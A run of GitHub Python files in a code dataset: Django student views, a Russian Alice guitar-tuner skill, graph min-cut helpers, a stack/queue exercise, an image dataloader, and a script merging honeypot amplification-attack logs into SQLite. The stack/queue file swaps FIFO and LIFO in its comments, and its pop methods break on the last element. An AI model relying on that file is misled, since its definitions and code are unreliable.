context)\n\n\ndef editStudent(request, st_id):\n student = Student.objects.get(id=st_id)\n st_form = StudentForm(instance=student)\n\n if request.method == 'POST':\n st_form = StudentForm(request.POST, instance=student)\n if st_form.is_valid():\n st_form.save()\n return redirect('home')\n context = {'form': st_form}\n return render(request, 'djApp/add-student.html', context)\n\n\ndef ListStudentDetails(request, st_id):\n st = Student.objects.get(id=st_id)\n context = {'st': st}\n return render(request, 'djApp/st-details.html', context)\n\n\n# rest_framework views.\n@api_view(['GET'])\ndef api_all_students(request):\n all_st = Student.objects.all()\n sr_serializer = StudentSerializer(all_st, many=True)\n return Response(sr_serializer.data)\n\n\n@api_view(['GET'])\ndef api_student_details(request, st_id):\n all_st = Student.objects.get(id=st_id)\n sr_serializer = StudentSerializer(all_st, many=False)\n return Response(sr_serializer.data)\n\n\n@api_view(['POST'])\ndef api_student_create(request):\n print(\",,,,,,,,,,,,,,\", request.data)\n sr_serializer = StudentSerializer(data=request.data)\n if sr_serializer.is_valid():\n sr_serializer.save()\n return redirect('api-list')\n\n\n@api_view(['POST'])\ndef api_student_edit(request, st_id):\n st = Student.objects.get(id=st_id)\n sr_serializer = StudentSerializer(instance=st, data=request.data)\n if sr_serializer.is_valid():\n sr_serializer.save()\n return redirect('api-list')\n\n\n@api_view(['DELETE'])\ndef api_student_delete(request, st_id):\n print(\",,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,\")\n st = Student.objects.get(id=st_id)\n print(st)\n st.delete()\n return Response('User Deleted')\n","repo_name":"SamarNegm/Python-And-Django","sub_path":"day3/djproj/djApp/views.py","file_name":"views.py","file_ext":"py","file_size_in_byte":2775,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"72"} +{"seq_id":"37884272681","text":"import logging\nimport json\nimport os\nfrom copy import deepcopy\nfrom random import choice, shuffle\nfrom flask import Flask, request\nfrom cards import get_menu_card\nfrom constants import *\n\napp = Flask(__name__)\nlogging.basicConfig(level=logging.INFO)\nsessionStorage = {}\n\nCHOICE_DICT = {\n 1: ['1', 'один', 'первый', 'первая', 'первое', 'первые', 'раз', 'однёрка'],\n 2: ['2', 'два', 'второй', 'вторая', 'второе', 'вторые', 'двойка'],\n 3: ['3', 'три', 'третий', 'третья', 'третье', 'третьи', 'тройка'],\n 4: ['4', 'четыре', 'четвёртый', 'четвёртая', 'четвёртое', 'четвёртые', 'четвёрка',\n 'четвертый', 'четвертая', 'четвертое', 'четверка', 'четвертые'],\n 5: ['5', 'пять', 'пятый', 'пятая', 'пятое', 'пятые', 'пятёрка', 'пятерка'],\n 6: ['6', 'шестёрка', 'шесть', 'шестой', 'шестая', 'шестое', 'шаха', 'шест']\n}\n\n\n@app.route('/post', methods=['POST'])\ndef main():\n response = {\n 'session': request.json['session'],\n 'version': request.json['version'],\n 'response': {\n 'end_session': False\n }\n }\n req = request.json\n handle_dialog(response, req)\n user_id = req['session']['user_id']\n res_text = response['response']['text']\n # Здесь учитываются все баги, когда какого-то ключа нет в реквесте\n if 'original_utterance' in req['request'] and req['request']['original_utterance'] != 'ping':\n log(user_id, req['request']['original_utterance'], res_text)\n elif 'command' in req['request'] and req['request']['command'] != 'ping':\n log(user_id, req['request']['command'], res_text)\n elif 'payload' in req['request']:\n log(user_id, req['request']['payload']['text'], res_text)\n return json.dumps(response)\n\n\n# Вывод логов формата ID: запрос-ответ\ndef log(user_id, request, response):\n logging.info(f'{user_id[:5]}\\nREQUEST: {request}\\nRESPONSE: {response}\\n----------------')\n\n\ndef handle_dialog(res, req):\n user_id = req['session']['user_id']\n if req[\"request\"].get(\"original_utterance\", \"\") == 'ping':\n res['response']['text'] = 'Хватит пинговать с моего USER_ID, ты всё портишь.'\n return\n\n if req['session']['new']:\n sessionStorage[user_id] = {\n 'state': STATE_HELLO\n }\n text = 'Привет. Выберите гитару.'\n card, tts = get_menu_card(text)\n\n res['response']['text'] = text\n res['response']['card'] = card\n res['response']['tts'] = text + tts\n res['response']['buttons'] = []\n else:\n tokens = req['request']['nlu']['tokens']\n if not tokens:\n if 'payload' in req['request']:\n tokens = req['request']['payload']['text'].lower()\n else:\n tokens = req['request']['command'].lower()\n if user_id not in sessionStorage:\n sessionStorage[user_id] = {'state': STATE_HELLO}\n game_info = sessionStorage[user_id]\n\n if any(word in tokens for word in ['акустика', 'акустическая', 'кусты']):\n game_info['state'] = STATE_ACOUSTIC\n show_guitar(res, game_info)\n elif any(word in tokens for word in ['классика', 'классическая', 'обычная']):\n game_info['state'] = STATE_CLASSIC\n show_guitar(res, game_info)\n elif any(word in tokens for word in ['бас', 'басс', 'бочка', 'басовая', 'бас-гитара']):\n game_info['state'] = STATE_BAS\n show_guitar(res, game_info)\n elif any(word in tokens for word in ['электро', 'электроника', 'электрогитара']):\n game_info['state'] = STATE_ELECTRO\n show_guitar(res, game_info)\n elif any(word in tokens for word in ['помощь', 'помоги', 'как', 'подсказка']):\n res['response'][\n 'text'] = 'Выберите гитару, которую вы желаете настроить,' \\\n ' а затем прослушайте как звучат идеально настроенные' \\\n ' струны и попытайтесь добиться такого же звучания, вращая' \\\n ' соответствующие колки. Не забывайте, первая струна, это самая нижняя. Удачи.'\n elif any(word in tokens for word in ['умеешь', 'можешь']):\n res['response']['text'] = 'Я могу помочь вам настроить гитару.'\n elif STATE_ACOUSTIC <= game_info['state'] <= STATE_ELECTRO:\n flag = 0\n for i in CHOICE_DICT:\n if any(word in tokens for word in CHOICE_DICT[i]):\n flag = i\n break\n\n if flag:\n game_info['string'] = flag\n res['response']['text'] = f'Воспроизвожу звук {flag} струны.'\n res['response']['tts'] = '' \\\n .format(GUITARS[game_info[\"state\"] - 1][\"strings\"][str(flag)]) * REPEATS\n else:\n if 'string' in game_info and any(word in req['request']['nlu']['tokens'] for word in\n ['еще', 'ещё', 'повтори', 'повтори-ка',\n 'повтор', 'понял', 'слышал', 'услышал',\n 'расслышал', 'прослушал', 'скажи', 'а']):\n i = game_info['string']\n res['response']['text'] = f'Воспроизвожу звук {i} струны.'\n res['response'][\n 'tts'] = '' \\\n .format(GUITARS[game_info[\"state\"] - 1][\"strings\"][str(i)]) * REPEATS\n else:\n res['response']['text'] = f'Выберите струну'\n res['response']['tts'] = 'Выберите струну от 1 до {}. Первая - самая нижняя'.format(\n 4 if game_info['state'] == STATE_BAS else 6)\n add_wtf(f\"{game_info['state']}. {req['request']['original_utterance']}\")\n\n elif any(word in tokens for word in [\n 'выход', 'хватит', 'пока', 'свидания', 'стоп', 'выйти',\n 'выключи', 'останови', 'остановить', 'отмена', 'закончить',\n 'закончи', 'отстань', 'назад', 'обратно', 'верни', 'вернись'\n ]):\n res['response']['text'] = 'Пока'\n res['response']['end_session'] = True\n else:\n res['response']['text'] = choice(WTF) + ' Попробуйте ещё раз или скажите \"Помощь\".'\n add_wtf(f\"{game_info['state']}. {req['request']['original_utterance']}\")\n\n add_default_buttons(res, req)\n\n\ndef show_guitar(res, game_info):\n res['response']['text'] = 'Выберите струну.'\n res['response']['tts'] = 'Выберите струну от 1 до {}. Первая - самая нижняя'.format(\n 4 if game_info['state'] == STATE_BAS else 6)\n if 'string' in game_info:\n game_info.pop('string')\n for guitar in GUITARS:\n if guitar['state'] == game_info['state']:\n res['response']['buttons'] = [\n {\n 'title': s,\n 'hide': True\n } for s in guitar['strings']\n ]\n break\n\n\n# Добавление прошлых кнопок, чтобы они не пропадали после неверного запроса\ndef add_default_buttons(res, req):\n user_id = req['session']['user_id']\n game_info = sessionStorage[user_id]\n\n if 'buttons' in res['response']:\n game_info['last_btns'] = deepcopy(res['response']['buttons'])\n else:\n res['response']['buttons'] = deepcopy(sessionStorage[user_id]['last_btns'])\n\n for button in ['Помощь', 'Что ты умеешь?']:\n button_dict = {'title': button, 'hide': True}\n if button_dict not in res['response']['buttons']:\n res['response']['buttons'].append(button_dict)\n\n\ndef add_wtf(text):\n with open(os.path.join(os.path.dirname(os.path.abspath(__file__)), 'wtf.txt'), 'a', encoding='utf8') as file:\n file.write(text + '\\n')\n\n\nWTF = ['Не поняла', 'Мои нейроны Вас не понимают', 'Извините, я Вас не поняла',\n 'Моя твоя не понимать', 'Я Вас не ферштэйн', 'Извините, я вас не понимаю']\n","repo_name":"Vo5torg/GuitarTunerForAlice","sub_path":"main.py","file_name":"main.py","file_ext":"py","file_size_in_byte":9388,"program_lang":"python","lang":"ru","doc_type":"code","stars":0,"dataset":"github-code","pt":"72"} +{"seq_id":"71514795114","text":"import numpy as np\nimport logging\nimport networkx\nimport os\nfrom scipy import misc\nimport maxflow\n\n\ndef loadunaryfile(filename):\n file = open(filename, \"r\")\n\n xsize = int(file.readline())\n ysize = int(file.readline())\n labels = int(file.readline())\n\n data = np.empty((ysize, xsize, labels))\n\n for x in range(xsize):\n for y in range(ysize):\n for l in range(labels):\n data[y, x, l] = float(file.readline())\n\n return data\n\n\ndef readimg_normalize(imagename):\n img = misc.imread(os.path.join(\"data\", imagename))\n img = np.array(img, dtype=np.float64) / 255\n return img\n\n\ndef readimg(imagename):\n return misc.imread(os.path.join(\"data\", imagename))\n\n\ndef readimg_grayscale(imagename):\n return misc.imread(os.path.join(\"data\", imagename), 'L')\n\n\nclass Node:\n def __init__(self, y, x):\n self.y = y\n self.x = x\n\n def pos(self):\n return self.y, self.x\n\n\nclass Nodegrid:\n def __init__(self, ysize, xsize):\n # Create grid of nodes\n self.nodegrid = [[Node(y, x) for x in range(xsize)] for y in range(ysize)]\n\n self.g = networkx.DiGraph()\n for nodelist in self.nodegrid:\n self.g.add_nodes_from(nodelist)\n\n # Source node\n self.source = Node(-1, -1)\n self.sink = Node(-1, -1)\n\n self.g.add_node(self.source)\n self.g.add_node(self.sink)\n\n self.ysize = ysize\n self.xsize = xsize\n\n def loop(self, edgecallback, nodecallback):\n \"\"\"\n Loops over the grid of nodes. Two callback functions are required:\n\n :param edgecallback: Called for every edge.\n :param nodecallback: Called for every node.\n \"\"\"\n logging.info(\"Iterate through graph.\")\n\n for y in range(self.ysize - 1):\n for x in range(self.xsize - 1):\n node_i = self.nodegrid[y][x]\n\n # Node\n nodecallback(node_i)\n\n # Right edge\n node_j = self.nodegrid[y][x + 1]\n edgecallback(node_i, node_j)\n\n # Down edge\n node_j = self.nodegrid[y + 1][x]\n edgecallback(node_i, node_j)\n\n # Last column\n for y in range(self.ysize - 1):\n node_i = self.nodegrid[y][self.xsize - 1]\n\n # Node\n nodecallback(node_i)\n\n # Down edge\n node_j = self.nodegrid[y + 1][self.xsize - 1]\n edgecallback(node_i, node_j)\n\n # Last row\n for x in range(self.xsize - 1):\n node_i = self.nodegrid[self.ysize - 1][x]\n\n # Node\n nodecallback(node_i)\n\n # Right edge\n node_j = self.nodegrid[self.ysize - 1][x + 1]\n edgecallback(node_i, node_j)\n\n # Last node\n nodecallback(self.nodegrid[self.ysize - 1][self.xsize - 1])\n\n def loopedges(self, edgecallback):\n logging.info(\"Iterate through edges.\")\n\n for y in range(self.ysize - 1):\n for x in range(self.xsize - 1):\n node_i = self.nodegrid[y][x]\n\n # Right edge\n node_j = self.nodegrid[y][x + 1]\n edgecallback(node_i, node_j)\n\n # Down edge\n node_j = self.nodegrid[y + 1][x]\n edgecallback(node_i, node_j)\n\n # Last column\n for y in range(self.ysize - 1):\n node_i = self.nodegrid[y][self.xsize - 1]\n\n # Down edge\n node_j = self.nodegrid[y + 1][self.xsize - 1]\n edgecallback(node_i, node_j)\n\n # Last row\n for x in range(self.xsize - 1):\n node_i = self.nodegrid[self.ysize - 1][x]\n\n # Right edge\n node_j = self.nodegrid[self.ysize - 1][x + 1]\n edgecallback(node_i, node_j)\n\n @staticmethod\n def loopedges_raw(callback, ysize, xsize):\n logging.info(\"Iterate through edges.\")\n\n for y in range(ysize - 1):\n for x in range(xsize - 1):\n pos_i = (y, x)\n\n # Right edge\n pos_j = (y, x + 1)\n callback(pos_i, pos_j)\n\n # Down edge\n pos_j = (y + 1, x)\n callback(pos_i, pos_j)\n\n # Last column\n for y in range(ysize - 1):\n pos_i = (y, xsize - 1)\n\n # Down edge\n pos_j = (y + 1, xsize - 1)\n callback(pos_i, pos_j)\n\n # Last row\n for x in range(xsize - 1):\n pos_i = (ysize - 1, x)\n\n # Right edge\n pos_j = (ysize - 1, x + 1)\n callback(pos_i, pos_j)\n\n @staticmethod\n def loopnodes_raw(callback, ysize, xsize):\n logging.info(\"Iterate through nodes.\")\n for y in range(ysize):\n for x in range(xsize):\n callback((y, x))\n\n def loopnodes(self, callback):\n logging.info(\"Iterate through nodes.\")\n for y in range(self.ysize):\n for x in range(self.xsize):\n callback(self.nodegrid[y][x])\n\n def add_edge(self, node_i, node_j, capacity):\n self.g.add_edge(node_i, node_j, capacity=capacity)\n\n def add_source_edge(self, node, capacity):\n self.g.add_edge(self.source, node, capacity=capacity)\n\n def add_sink_edge(self, node, capacity):\n self.g.add_edge(node, self.sink, capacity=capacity)\n\n def maxflow(self):\n logging.info(\"Calculate max flow.\")\n value, flows = networkx.maximum_flow(self.g, self.source, self.sink)\n return value, flows\n\n def mincut(self):\n logging.info(\"Calculate mincut.\")\n value, cut = networkx.minimum_cut(self.g, self.source, self.sink)\n return value, cut\n\n def getcap(self, node):\n return self.g[self.source][node][\"capacity\"]\n\n def hassourcepath(self, node):\n return node in self.g[self.source]\n\n def draw(self):\n positions = {}\n for nodelist in self.nodegrid:\n for node in nodelist:\n positions[node] = [node.x, node.y]\n\n pad = 2\n nodesize = 10\n positions[self.source] = [self.xsize / 2 - 0.5, -pad]\n positions[self.sink] = [self.xsize / 2 - 0.5, self.ysize + pad]\n networkx.draw_networkx(self.g, pos=positions,\n node_size=nodesize, with_labels=False,\n width=0.5)\n\n\nclass Node_c:\n def __init__(self, nodeid, y, x):\n self.nodeid = nodeid\n self.y = y\n self.x = x\n\n\nclass Nodegrid_c:\n def __init__(self, ysize, xsize):\n self.g = maxflow.GraphFloat()\n\n self.nodeids = self.g.add_grid_nodes((ysize, xsize))\n\n self.ysize = ysize\n self.xsize = xsize\n\n def loop(self, edgecallback, nodecallback):\n \"\"\"\n Loops over the grid of nodes. Two callback functions are required:\n\n :param edgecallback: Called for every edge.\n :param nodecallback: Called for every node.\n \"\"\"\n logging.info(\"Iterate through graph.\")\n\n for y in range(self.ysize - 1):\n for x in range(self.xsize - 1):\n node_i = self.getNode(y, x)\n\n # Node\n nodecallback(node_i)\n\n # Right edge\n node_j = self.getNode(y, x + 1)\n edgecallback(node_i, node_j)\n\n # Down edge\n node_j = self.getNode(y + 1, x)\n edgecallback(node_i, node_j)\n\n # Right-down edge\n node_j = self.getNode(y + 1, x + 1)\n edgecallback(node_i, node_j)\n\n node_i = self.getNode(y, x + 1)\n node_j = self.getNode(y + 1, x)\n edgecallback(node_i, node_j)\n\n # Last column\n for y in range(self.ysize - 1):\n node_i = self.getNode(y, self.xsize - 1)\n\n # Node\n nodecallback(node_i)\n\n # Down edge\n node_j = self.getNode(y + 1, self.xsize - 1)\n edgecallback(node_i, node_j)\n\n # Last row\n for x in range(self.xsize - 1):\n node_i = self.getNode(self.ysize - 1, x)\n\n # Node\n nodecallback(node_i)\n\n # Right edge\n node_j = self.getNode(self.ysize - 1, x + 1)\n edgecallback(node_i, node_j)\n\n # Last node\n nodecallback(self.getNode(self.ysize - 1, self.xsize - 1))\n\n def add_sink_edge(self, node_i, cap):\n self.g.add_tedge(node_i.nodeid, 0, cap)\n\n def add_source_edge(self, node_i, cap):\n self.g.add_tedge(node_i.nodeid, cap, 0)\n\n def add_edge(self, node_i, node_j, cap):\n self.g.add_edge(node_i.nodeid, node_j.nodeid, cap, cap)\n\n def loopnodes(self, callback):\n logging.info(\"Iterate through nodes.\")\n for y in range(self.ysize):\n for x in range(self.xsize):\n callback(self.getNode(y, x))\n\n def maxflow(self):\n logging.info(\"Calculate max flow.\")\n return self.g.maxflow()\n\n def getNode(self, y, x):\n return Node_c(self.nodeids[y, x], y, x)\n\n def getsegment(self, node):\n return self.g.get_segment(node.nodeid)","repo_name":"JeGa/Branch-And-Mincut","sub_path":"utility.py","file_name":"utility.py","file_ext":"py","file_size_in_byte":9129,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"72"} +{"seq_id":"38444962642","text":"\n\nclass Node(object):\n next = None\n previous = None\n\n def __init__(self, value):\n self.value = value\n\n\n# Stack - FIFO\nclass Stack(object):\n head = None\n tail = None\n size = 0\n\n def push(self, value):\n node = Node(value)\n\n if self.tail:\n node.previous = self.tail\n self.tail.next = node\n\n self.tail = node\n\n if not self.head:\n self.head = node\n\n self.size += 1\n\n def pop(self):\n last_node = self.tail\n self.tail = self.tail.previous\n self.tail.next = None\n\n self.size -= 1\n\n return last_node.value\n\n\n# LIFO\nclass Queue(object):\n head = None\n tail = None\n size = 0\n\n def push(self, value):\n node = Node(value)\n\n if self.tail:\n node.previous = self.tail\n self.tail.next = node\n\n self.tail = node\n\n if not self.head:\n self.head = node\n\n self.size += 1\n\n def pop(self):\n first_node = self.head\n self.head = self.head.next\n self.head.previous = None\n\n self.size -= 1\n\n return first_node.value\n\n\n# test Stack:\nprint('Testing Stack FIFO')\ns = Stack()\nfor i in range(10):\n s.push(i)\nfor i in range(5):\n print(s.pop())\n\n\n# test Queue:\nprint('Testing Queue LIFO')\ns = Queue()\nfor i in range(10):\n s.push(i)\nfor i in range(5):\n print(s.pop())\n\n","repo_name":"TimurNurlygayanov/test-tasks-example","sub_path":"algs/stack_and_queue.py","file_name":"stack_and_queue.py","file_ext":"py","file_size_in_byte":1396,"program_lang":"python","lang":"en","doc_type":"code","stars":2,"dataset":"github-code","pt":"72"} +{"seq_id":"13329635256","text":"import pandas as pd\nimport torch as t\nfrom torch.utils import data\nimport numpy as np\nfrom PIL import Image\nfrom torchvision import transforms\n\nclass dataLoader(data.Dataset):\n def __init__(self, src_path, mode):\n \"\"\"\n Args:\n src_path (string): source path of the dataset.\n mode : Indicate procedure status(training or testing)\n\n self.img_name (string list): String list that store all image names.\n self.label (int or float list): Numerical list that store all ground truth label values.\n \"\"\"\n self.src_path = src_path\n self.mode = mode\n self.map_label = {'Bedroom': 0, 'Coast': 1, 'Forest': 2, 'Highway': 3, 'Industrial': 4, 'InsideCity': 5, 'Kitchen': 6, 'LivingRoom': 7, 'Mountain': 8, 'Office': 9, 'OpenCountry': 10, 'Store': 11, 'Street': 12, 'Suburb': 13, 'TallBuilding': 14}\n self.img_name, self.label = self.getData()\n\n self.trans = transforms.Compose([transforms.Resize((250, 250), interpolation=Image.NEAREST),\n transforms.ToTensor(),\n transforms.Normalize(mean=[0.485, 0.456, 0.406],\n std=[0.229, 0.224, 0.225])])\n\n\n print(\"> Found %d images...\" % (len(self.img_name)))\n\n def __len__(self):\n \"\"\"'return the size of dataset\"\"\"\n return len(self.img_name)\n\n def __getitem__(self, index):\n label_name = self.label[index]\n label = self.map_label[self.label[index]]\n path = self.src_path + self.mode + '/' + label_name + '/' + self.img_name[index]\n\n img_origin = Image.open(path, 'r').convert('RGB')\n img = self.trans(img_origin)\n\n return img, label\n\n def getData(self):\n img = pd.read_csv(self.src_path + self.mode + '/img.csv')\n label = pd.read_csv(self.src_path + self.mode + '/label.csv')\n\n return np.squeeze(img.values), np.squeeze(label.values)\n\n","repo_name":"yu2guang/NCTU-CS","sub_path":"Computer-Vision/HW5-Classifier/dataloader.py","file_name":"dataloader.py","file_ext":"py","file_size_in_byte":1995,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"72"} +{"seq_id":"34339328717","text":"def check_rhythm(poem):\n lines = poem.split()\n syllables = []\n\n for line in lines:\n words = line.split('-')\n count = 0\n for word in words:\n count += count_syllables(word)\n syllables.append(count)\n\n if len(set(syllables)) == 1:\n return \"Парам пам-пам\"\n else:\n return \"Пам парам\"\n\ndef count_syllables(word):\n vowels = \"УуЕеЫыАаООоЭэЯяИиЮю\"\n count = 0\n\n if word[0] in vowels: \n count += 1\n\n for i in range(1, len(word)):\n if word[i] in vowels and word[i-1] not in vowels:\n count += 1\n\n return count\n\npoem = input(\"Введите стихотворение Винни-Пуха: \")\nresult = check_rhythm(poem)\nprint(result)","repo_name":"Glieq/gbPython-7","sub_path":"task1.py","file_name":"task1.py","file_ext":"py","file_size_in_byte":764,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"72"} +{"seq_id":"22444657216","text":"import sqlite3\n\nmix_connection = sqlite3.connect('../db/database-2022-05-11/mix_protocol.sqlite', timeout=10)\nmix_cursor = mix_connection.cursor()\n# MIX PROTOCOL PRECISA FILTRAR >=5 E YEAR_PERIOD ENTRE 20184 E 20221\n\nmix_cursor.execute(\"DROP TABLE IF EXISTS MIX_PROTOCOL;\")\nmix_cursor.execute(\"\"\"\nCREATE TABLE MIX_PROTOCOL (\n\tid INTEGER NOT NULL,\n attack_protocol TEXT NOT NULL,\n\trequests_per_attack INTEGER NOT NULL,\n tempo_inicio TEXT NOT NULL,\n tempo_final TEXT NOT NULL,\n vitima_ip TEXT NOT NULL,\n raw_payload TEXT DEFAULT \"-\"\n);\n\"\"\")\nmix_connection.commit()\n\nprotocol_id = int(1)\nprotocol_mix = []\n\nntp_connection = sqlite3.connect('../db/database-2022-05-11/dnstor_statistics_ntp.sqlite', timeout=10)\nntp_cursor = ntp_connection.cursor()\n\nfor ntp_row in ntp_cursor.execute(\"\"\"\n SELECT count, tempoInicio, tempoFinal, ip, payload\n FROM NTP_MEMORY_DICT\nLEFT JOIN NTP_PAYLOAD_DICT\n ON NTP_MEMORY_DICT.payloadID = NTP_PAYLOAD_DICT.payloadID;\n\"\"\"):\n count = int(ntp_row[0])\n tempoInicio = ntp_row[1]\n tempoFinal = ntp_row[2]\n ipVitima = ntp_row[3]\n payload = ntp_row[4]\n\n protocol_mix.append((protocol_id, \"NTP\", count, tempoInicio, tempoFinal, ipVitima, payload))\n protocol_id += 1\n\nntp_connection.close()\nprint('ntp finish: ', len(protocol_mix))\n\nmix_cursor.executemany('INSERT INTO MIX_PROTOCOL VALUES (?,?,?,?,?,?,?)', protocol_mix)\nmix_connection.commit()\n\n\nprotocol_mix = []\ndns_connection = sqlite3.connect('../db/database-2022-05-11/dnstor_statistics_dns.sqlite', timeout=10)\ndns_cursor = dns_connection.cursor()\n\nfor dns_row in dns_cursor.execute(\"\"\"\n SELECT count, tempoInicio, tempoFinal, ip, payload\n FROM DNS_MEMORY_DICT\nLEFT JOIN DNS_PAYLOAD_DICT\n ON DNS_MEMORY_DICT.payloadID = DNS_PAYLOAD_DICT.payloadID;\n\"\"\"):\n count = int(dns_row[0])\n tempoInicio = dns_row[1]\n tempoFinal = dns_row[2]\n ipVitima = dns_row[3]\n payload = dns_row[4]\n\n protocol_mix.append((protocol_id, \"DNS\", count, tempoInicio, tempoFinal, ipVitima, payload))\n protocol_id += 1\n\ndns_connection.close()\n\nmix_cursor.executemany('INSERT INTO MIX_PROTOCOL VALUES (?,?,?,?,?,?,?)', protocol_mix)\nmix_connection.commit()\nprint('dns finish: ', len(protocol_mix))\n\n\nprotocol_mix = []\nchargen_connection = sqlite3.connect('../db/database-2022-05-11/dnstor_statistics_chargen.sqlite', timeout=10)\nchargen_cursor = chargen_connection.cursor()\n\nfor chargen_row in chargen_cursor.execute(\"\"\"\n SELECT count, tempoInicio, tempoFinal, ip, payload\n FROM CHARGEN_MEMORY_DICT\nLEFT JOIN CHARGEN_PAYLOAD_DICT\n ON CHARGEN_MEMORY_DICT.payloadID = CHARGEN_PAYLOAD_DICT.payloadID;\n\"\"\"):\n count = int(chargen_row[0])\n tempoInicio = chargen_row[1]\n tempoFinal = chargen_row[2]\n ipVitima = chargen_row[3]\n payload = chargen_row[4]\n\n protocol_mix.append((protocol_id, \"CHARGEN\", count, tempoInicio, tempoFinal, ipVitima, payload))\n protocol_id += 1\n\nchargen_connection.close()\n\nmix_cursor.executemany('INSERT INTO MIX_PROTOCOL VALUES (?,?,?,?,?,?,?)', protocol_mix)\nmix_connection.commit()\nprint('chargen finish: ', len(protocol_mix))\n\n\n\nprotocol_mix = []\ncldap_connection = sqlite3.connect('../db/database-2022-05-11/dnstor_statistics_cldap.sqlite', timeout=10)\ncldap_cursor = cldap_connection.cursor()\n\nfor cldap_row in cldap_cursor.execute(\"\"\"\n SELECT count, tempoInicio, tempoFinal, ip, payload\n FROM CLDAP_MEMORY_DICT\nLEFT JOIN CLDAP_PAYLOAD_DICT\n ON CLDAP_MEMORY_DICT.payloadID = CLDAP_PAYLOAD_DICT.payloadID;\n\"\"\"):\n count = int(cldap_row[0])\n tempoInicio = cldap_row[1]\n tempoFinal = cldap_row[2]\n ipVitima = cldap_row[3]\n payload = cldap_row[4]\n\n protocol_mix.append((protocol_id, \"CLDAP\", count, tempoInicio, tempoFinal, ipVitima, payload))\n protocol_id += 1\n\ncldap_connection.close()\n\nmix_cursor.executemany('INSERT INTO MIX_PROTOCOL VALUES (?,?,?,?,?,?,?)', protocol_mix)\nmix_connection.commit()\nprint('cldap finish: ', len(protocol_mix))\n\n\nprotocol_mix = []\ncoap_connection = sqlite3.connect('../db/database-2022-05-11/dnstor_statistics_coap.sqlite', timeout=10)\ncoap_cursor = coap_connection.cursor()\n\nfor coap_row in coap_cursor.execute(\"\"\"\n SELECT count, tempoInicio, tempoFinal, ip, payload\n FROM COAP_MEMORY_DICT\nLEFT JOIN COAP_PAYLOAD_DICT\n ON COAP_MEMORY_DICT.payloadID = COAP_PAYLOAD_DICT.payloadID;\n\"\"\"):\n count = int(coap_row[0])\n tempoInicio = coap_row[1]\n tempoFinal = coap_row[2]\n ipVitima = coap_row[3]\n payload = coap_row[4]\n\n protocol_mix.append((protocol_id, \"COAP\", count, tempoInicio, tempoFinal, ipVitima, payload))\n protocol_id += 1\n\ncoap_connection.close()\n\nmix_cursor.executemany('INSERT INTO MIX_PROTOCOL VALUES (?,?,?,?,?,?,?)', protocol_mix)\nmix_connection.commit()\nprint('coap finish: ', len(protocol_mix))\n\nprotocol_mix = []\nmemcached_connection = sqlite3.connect('../db/database-2022-05-11/dnstor_statistics_memcached.sqlite', timeout=10)\nmemcached_cursor = memcached_connection.cursor()\n\nfor memcached_row in memcached_cursor.execute(\"\"\"\n SELECT count, tempoInicio, tempoFinal, ip, payload\n FROM MEMCACHED_MEMORY_DICT\nLEFT JOIN MEMCACHED_PAYLOAD_DICT\n ON MEMCACHED_MEMORY_DICT.payloadID = MEMCACHED_PAYLOAD_DICT.payloadID;\n\"\"\"):\n count = int(memcached_row[0])\n tempoInicio = memcached_row[1]\n tempoFinal = memcached_row[2]\n ipVitima = memcached_row[3]\n payload = memcached_row[4]\n\n protocol_mix.append((protocol_id, \"MEMCACHED\", count, tempoInicio, tempoFinal, ipVitima, payload))\n protocol_id += 1\n\nmemcached_connection.close()\n\nmix_cursor.executemany('INSERT INTO MIX_PROTOCOL VALUES (?,?,?,?,?,?,?)', protocol_mix)\nmix_connection.commit()\nprint('memcached finish: ', len(protocol_mix))\n\n\n\nprotocol_mix = []\nqotd_connection = sqlite3.connect('../db/database-2022-05-11/dnstor_statistics_qotd.sqlite', timeout=10)\nqotd_cursor = qotd_connection.cursor()\n\nfor qotd_row in qotd_cursor.execute(\"\"\"\n SELECT count, tempoInicio, tempoFinal, ip, payload\n FROM QOTD_MEMORY_DICT\nLEFT JOIN QOTD_PAYLOAD_DICT\n ON QOTD_MEMORY_DICT.payloadID = QOTD_PAYLOAD_DICT.payloadID;\n\"\"\"):\n count = int(qotd_row[0])\n tempoInicio = qotd_row[1]\n tempoFinal = qotd_row[2]\n ipVitima = qotd_row[3]\n payload = qotd_row[4]\n\n protocol_mix.append((protocol_id, \"QOTD\", count, tempoInicio, tempoFinal, ipVitima, payload))\n protocol_id += 1\n\nqotd_connection.close()\n\nmix_cursor.executemany('INSERT INTO MIX_PROTOCOL VALUES (?,?,?,?,?,?,?)', protocol_mix)\nmix_connection.commit()\nprint('qotd finish: ', len(protocol_mix))\n\n\n\nprotocol_mix = []\nssdp_connection = sqlite3.connect('../db/database-2022-05-11/dnstor_statistics_ssdp.sqlite', timeout=10)\nssdp_cursor = ssdp_connection.cursor()\n\nfor ssdp_row in ssdp_cursor.execute(\"\"\"\n SELECT count, tempoInicio, tempoFinal, ip, payload\n FROM SSDP_MEMORY_DICT\nLEFT JOIN SSDP_PAYLOAD_DICT\n ON SSDP_MEMORY_DICT.payloadID = SSDP_PAYLOAD_DICT.payloadID;\n\"\"\"):\n count = int(ssdp_row[0])\n tempoInicio = ssdp_row[1]\n tempoFinal = ssdp_row[2]\n ipVitima = ssdp_row[3]\n payload = ssdp_row[4]\n\n protocol_mix.append((protocol_id, \"SSDP\", count, tempoInicio, tempoFinal, ipVitima, payload))\n protocol_id += 1\n\nssdp_connection.close()\n\nmix_cursor.executemany('INSERT INTO MIX_PROTOCOL VALUES (?,?,?,?,?,?,?)', protocol_mix)\nmix_connection.commit()\nprint('ssdp finish: ', len(protocol_mix))\n\n\nprotocol_mix = []\nsteam_games_connection = sqlite3.connect('../db/database-2022-05-11/dnstor_statistics_steam_games.sqlite', timeout=10)\nsteam_games_cursor = steam_games_connection.cursor()\n\nfor steam_games_row in steam_games_cursor.execute(\"\"\"\n SELECT count, tempoInicio, tempoFinal, ip, payload\n FROM MEMORY_DICT\nLEFT JOIN PAYLOAD_DICT\n ON MEMORY_DICT.payloadID = PAYLOAD_DICT.payloadID;\n\"\"\"):\n count = int(steam_games_row[0])\n tempoInicio = steam_games_row[1]\n tempoFinal = steam_games_row[2]\n ipVitima = steam_games_row[3]\n payload = steam_games_row[4]\n\n protocol_mix.append((protocol_id, \"STEAM_GAMES\", count, tempoInicio, tempoFinal, ipVitima, payload))\n protocol_id += 